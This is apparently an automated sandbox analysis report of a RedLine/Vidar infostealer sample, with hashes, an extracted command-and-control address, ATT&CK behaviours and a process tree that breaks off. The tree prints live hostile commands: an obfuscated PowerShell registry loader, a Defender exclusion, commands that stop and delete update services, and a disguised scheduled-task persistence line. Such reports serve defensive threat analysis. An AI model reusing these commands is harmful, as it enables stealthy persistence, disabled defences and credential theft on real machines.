redline | 49deb035d46391e414506e10e5d394a9c371e61299fb5539e71e7bd830099f52

Analysis

max time kernel
105s
max time network
136s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
25/10/2022, 06:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe
Size

445KB
MD5

9ee68713f2a7cffe160e3fc1b446f61e
SHA1

1cd56f8a27c8913e1d8c4dd0c97acdeb0f2242ab
SHA256

49deb035d46391e414506e10e5d394a9c371e61299fb5539e71e7bd830099f52
SHA512

bc3a3e92b945d2a0e3c1737e0e3173ab8d16ad934f8c0eb76559819f83a6e70e40e1953328db89b5518faf0790cd9fcc04a059f04d011f5f5f5c22502b2db717
SSDEEP

6144:AnKmSDahq196R5aa7OuWigFV5zGlPAMTZSNiicyB7wbtLd4Fr351azS/PIAOr/Tu:FDL6Pv6zrzGlIMTZ+6taB3LazwPIV90

Score

10^/10

redline vidar 1707 discovery evasion infostealer persistence spyware stealer upx

Malware Config

Extracted

Family

redline

62.204.41.141:24758

Attributes

auth_value
ea069d64c780fc5379eeb0792909ac77

Extracted

Family

vidar

Version

55.2

Botnet

1707

https://t.me/slivetalks

https://c.im/@xinibin420

Attributes

profile_id
1707

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral1/memory/98752-56-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/98752-61-0x000000000041B54E-mapping.dmp	family_redline
behavioral1/memory/98752-62-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/98752-63-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 157616 created 416	157616	powershell.EXE	3
PID 157624 created 416	157624	powershell.EXE	3

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file

Executes dropped EXE 6 IoCs

pid	Process
99068	ofg.exe
99172	test.exe
99232	brave.exe
108372	chrome.exe
157528	svcupdater.exe
157212	updater.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys"	services.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000e0000000132e5-82.dat	upx
behavioral1/files/0x000e0000000132e5-84.dat	upx
behavioral1/memory/99232-92-0x000000013FE90000-0x0000000140351000-memory.dmp	upx
behavioral1/memory/99232-113-0x000000013FE90000-0x0000000140351000-memory.dmp	upx
behavioral1/files/0x000e0000000132e5-170.dat	upx
behavioral1/memory/99232-175-0x000000013FE90000-0x0000000140351000-memory.dmp	upx
behavioral1/files/0x00080000000139dd-188.dat	upx
behavioral1/files/0x00080000000139dd-191.dat	upx
behavioral1/memory/157212-198-0x000000013FFE0000-0x00000001404A1000-memory.dmp	upx
behavioral1/files/0x00080000000139dd-613.dat	upx

Loads dropped DLL 22 IoCs

pid	Process
98752	AppLaunch.exe
98752	AppLaunch.exe
98752	AppLaunch.exe
98752	AppLaunch.exe
98752	AppLaunch.exe
98752	AppLaunch.exe
127988	WerFault.exe
127988	WerFault.exe
127988	WerFault.exe
127988	WerFault.exe
127988	WerFault.exe
157564	WerFault.exe
157564	WerFault.exe
157564	WerFault.exe
157564	WerFault.exe
157564	WerFault.exe
157564	WerFault.exe
157564	WerFault.exe
125212	taskeng.exe
157452	vbc.exe
157452	vbc.exe
157452	vbc.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 1760 set thread context of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 99172 set thread context of 157452	99172	test.exe	49
PID 99232 set thread context of 157356	99232	brave.exe	74
PID 157616 set thread context of 156964	157616	powershell.EXE	85
PID 157624 set thread context of 157028	157624	powershell.EXE	86
PID 157212 set thread context of 157204	157212	updater.exe	104
PID 157212 set thread context of 138904	157212	updater.exe	111

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	brave.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\GoogleUpdate.exe	chrome.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
157148	sc.exe
157264	sc.exe
157340	sc.exe
157460	sc.exe
157104	sc.exe
156848	sc.exe
124148	sc.exe
157116	sc.exe
157288	sc.exe
157632	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
98792	1760	WerFault.exe	26
127988	108372	WerFault.exe	38
157564	99172	WerFault.exe	35

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cmd.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
127316	SCHTASKS.exe
157536	schtasks.exe
816	schtasks.exe
99136	schtasks.exe
124388	SCHTASKS.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
157216	timeout.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b09aded33ae8d801	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
98752	AppLaunch.exe
118168	powershell.exe
118168	powershell.exe
157316	powershell.exe
157084	powershell.exe
157344	powershell.exe
157616	powershell.EXE
157624	powershell.EXE
157616	powershell.EXE
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
157624	powershell.EXE
157028	dllhost.exe
157028	dllhost.exe
157028	dllhost.exe
157028	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
157452	cmd.exe
156964	dllhost.exe
156964	dllhost.exe
157108	powershell.exe
157028	dllhost.exe
157028	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
157028	dllhost.exe
157028	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
157028	dllhost.exe
157028	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
98936	powershell.exe
157028	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
157028	dllhost.exe
156964	dllhost.exe
157028	dllhost.exe
156964	dllhost.exe
157028	dllhost.exe
157028	dllhost.exe
157028	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
156964	dllhost.exe
157028	dllhost.exe
157028	dllhost.exe
156964	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	services.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	98752	AppLaunch.exe
Token: SeDebugPrivilege	99068	ofg.exe
Token: SeDebugPrivilege	118168	powershell.exe
Token: SeDebugPrivilege	157528	svcupdater.exe
Token: SeDebugPrivilege	157316	powershell.exe
Token: SeShutdownPrivilege	157188	powercfg.exe
Token: SeShutdownPrivilege	157292	powercfg.exe
Token: SeDebugPrivilege	157084	powershell.exe
Token: SeShutdownPrivilege	157300	powercfg.exe
Token: SeShutdownPrivilege	157332	powercfg.exe
Token: SeDebugPrivilege	157344	powershell.exe
Token: SeDebugPrivilege	157616	powershell.EXE
Token: SeDebugPrivilege	157624	powershell.EXE
Token: SeDebugPrivilege	157616	powershell.EXE
Token: SeDebugPrivilege	156964	dllhost.exe
Token: SeDebugPrivilege	157624	powershell.EXE
Token: SeDebugPrivilege	157028	dllhost.exe
Token: SeAuditPrivilege	868	svchost.exe
Token: SeDebugPrivilege	157108	powershell.exe
Token: SeAuditPrivilege	868	svchost.exe
Token: SeDebugPrivilege	98936	powershell.exe
Token: SeShutdownPrivilege	157076	powercfg.exe
Token: SeShutdownPrivilege	157020	wmiprvse.exe
Token: SeShutdownPrivilege	816	powercfg.exe
Token: SeShutdownPrivilege	157356	powercfg.exe
Token: SeDebugPrivilege	157212	updater.exe
Token: SeAssignPrimaryTokenPrivilege	156676	WMIC.exe
Token: SeIncreaseQuotaPrivilege	156676	WMIC.exe
Token: SeSecurityPrivilege	156676	WMIC.exe
Token: SeTakeOwnershipPrivilege	156676	WMIC.exe
Token: SeLoadDriverPrivilege	156676	WMIC.exe
Token: SeSystemtimePrivilege	156676	WMIC.exe
Token: SeBackupPrivilege	156676	WMIC.exe
Token: SeRestorePrivilege	156676	WMIC.exe
Token: SeShutdownPrivilege	156676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	156676	WMIC.exe
Token: SeUndockPrivilege	156676	WMIC.exe
Token: SeManageVolumePrivilege	156676	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	156676	WMIC.exe
Token: SeIncreaseQuotaPrivilege	156676	WMIC.exe
Token: SeSecurityPrivilege	156676	WMIC.exe
Token: SeTakeOwnershipPrivilege	156676	WMIC.exe
Token: SeLoadDriverPrivilege	156676	WMIC.exe
Token: SeSystemtimePrivilege	156676	WMIC.exe
Token: SeBackupPrivilege	156676	WMIC.exe
Token: SeRestorePrivilege	156676	WMIC.exe
Token: SeShutdownPrivilege	156676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	156676	WMIC.exe
Token: SeUndockPrivilege	156676	WMIC.exe
Token: SeManageVolumePrivilege	156676	WMIC.exe
Token: SeLockMemoryPrivilege	138904	dialer.exe
Token: SeLoadDriverPrivilege	464	services.exe
Token: SeBackupPrivilege	464	services.exe
Token: SeRestorePrivilege	464	services.exe
Token: SeSecurityPrivilege	464	services.exe
Token: SeTakeOwnershipPrivilege	464	services.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1760 wrote to memory of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 1760 wrote to memory of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 1760 wrote to memory of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 1760 wrote to memory of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 1760 wrote to memory of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 1760 wrote to memory of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 1760 wrote to memory of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 1760 wrote to memory of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 1760 wrote to memory of 98752	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	28
PID 1760 wrote to memory of 98792	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	29
PID 1760 wrote to memory of 98792	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	29
PID 1760 wrote to memory of 98792	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	29
PID 1760 wrote to memory of 98792	1760	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	29
PID 98752 wrote to memory of 99068	98752	AppLaunch.exe	31
PID 98752 wrote to memory of 99068	98752	AppLaunch.exe	31
PID 98752 wrote to memory of 99068	98752	AppLaunch.exe	31
PID 98752 wrote to memory of 99068	98752	AppLaunch.exe	31
PID 99068 wrote to memory of 99112	99068	ofg.exe	32
PID 99068 wrote to memory of 99112	99068	ofg.exe	32
PID 99068 wrote to memory of 99112	99068	ofg.exe	32
PID 99112 wrote to memory of 99136	99112	cmd.exe	34
PID 99112 wrote to memory of 99136	99112	cmd.exe	34
PID 99112 wrote to memory of 99136	99112	cmd.exe	34
PID 98752 wrote to memory of 99172	98752	AppLaunch.exe	35
PID 98752 wrote to memory of 99172	98752	AppLaunch.exe	35
PID 98752 wrote to memory of 99172	98752	AppLaunch.exe	35
PID 98752 wrote to memory of 99172	98752	AppLaunch.exe	35
PID 98752 wrote to memory of 99172	98752	AppLaunch.exe	35
PID 98752 wrote to memory of 99172	98752	AppLaunch.exe	35
PID 98752 wrote to memory of 99172	98752	AppLaunch.exe	35
PID 98752 wrote to memory of 99232	98752	AppLaunch.exe	37
PID 98752 wrote to memory of 99232	98752	AppLaunch.exe	37
PID 98752 wrote to memory of 99232	98752	AppLaunch.exe	37
PID 98752 wrote to memory of 99232	98752	AppLaunch.exe	37
PID 98752 wrote to memory of 108372	98752	AppLaunch.exe	38
PID 98752 wrote to memory of 108372	98752	AppLaunch.exe	38
PID 98752 wrote to memory of 108372	98752	AppLaunch.exe	38
PID 98752 wrote to memory of 108372	98752	AppLaunch.exe	38
PID 98752 wrote to memory of 108372	98752	AppLaunch.exe	38
PID 98752 wrote to memory of 108372	98752	AppLaunch.exe	38
PID 98752 wrote to memory of 108372	98752	AppLaunch.exe	38
PID 108372 wrote to memory of 118168	108372	chrome.exe	39
PID 108372 wrote to memory of 118168	108372	chrome.exe	39
PID 108372 wrote to memory of 118168	108372	chrome.exe	39
PID 108372 wrote to memory of 118168	108372	chrome.exe	39
PID 108372 wrote to memory of 118168	108372	chrome.exe	39
PID 108372 wrote to memory of 118168	108372	chrome.exe	39
PID 108372 wrote to memory of 118168	108372	chrome.exe	39
PID 108372 wrote to memory of 124388	108372	chrome.exe	41
PID 108372 wrote to memory of 124388	108372	chrome.exe	41
PID 108372 wrote to memory of 124388	108372	chrome.exe	41
PID 108372 wrote to memory of 124388	108372	chrome.exe	41
PID 108372 wrote to memory of 124388	108372	chrome.exe	41
PID 108372 wrote to memory of 124388	108372	chrome.exe	41
PID 108372 wrote to memory of 124388	108372	chrome.exe	41
PID 108372 wrote to memory of 127316	108372	chrome.exe	43
PID 108372 wrote to memory of 127316	108372	chrome.exe	43
PID 108372 wrote to memory of 127316	108372	chrome.exe	43
PID 108372 wrote to memory of 127316	108372	chrome.exe	43
PID 108372 wrote to memory of 127316	108372	chrome.exe	43
PID 108372 wrote to memory of 127316	108372	chrome.exe	43
PID 108372 wrote to memory of 127316	108372	chrome.exe	43
PID 108372 wrote to memory of 127988	108372	chrome.exe	44
PID 108372 wrote to memory of 127988	108372	chrome.exe	44

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:472

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:464
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:748
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:744
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:1708
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1112
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1072
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:684
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:340
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {2BCCD24E-B07C-4455-86B6-68811CD9153C} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
    3⤵
    PID:157432
  - - C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe
      C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:157528
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {EFEB379A-6FD1-4570-ADF4-F1F08F202300} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Loads dropped DLL
    PID:125212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:157624
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:157616
  - - C:\Program Files\Google\Chrome\updater.exe
      "C:\Program Files\Google\Chrome\updater.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      PID:157212
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:157108
    - - C:\Windows\system32\cmd.exe
        
        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:98956
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:157116
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:157288
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:157104
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:156848
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:157632
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        6⤵
        
        PID:157304
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        6⤵
        
        PID:157044
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        6⤵
        
        PID:156684
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        6⤵
        
        PID:157044
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        6⤵
        
        PID:157288
    - - C:\Windows\system32\cmd.exe
        
        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        
        PID:98940
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:157076
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        
        PID:157020
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:816
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:157356
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:98936
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
        6⤵
        Creates scheduled task(s)
        
        PID:816
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe xtrjicqmdliu
        5⤵
        
        PID:157204
      - C:\Windows\system32\cmd.exe
        
        cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        6⤵
        Drops file in Program Files directory
        
        PID:157456
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Name, VideoProcessor
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:156676
    - - C:\Windows\system32\cmd.exe
        
        cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        5⤵
        Drops file in Program Files directory
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:157452
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:138904
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:828
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:796
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:668
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:592
- - C:\Windows\system32\DllHost.exe
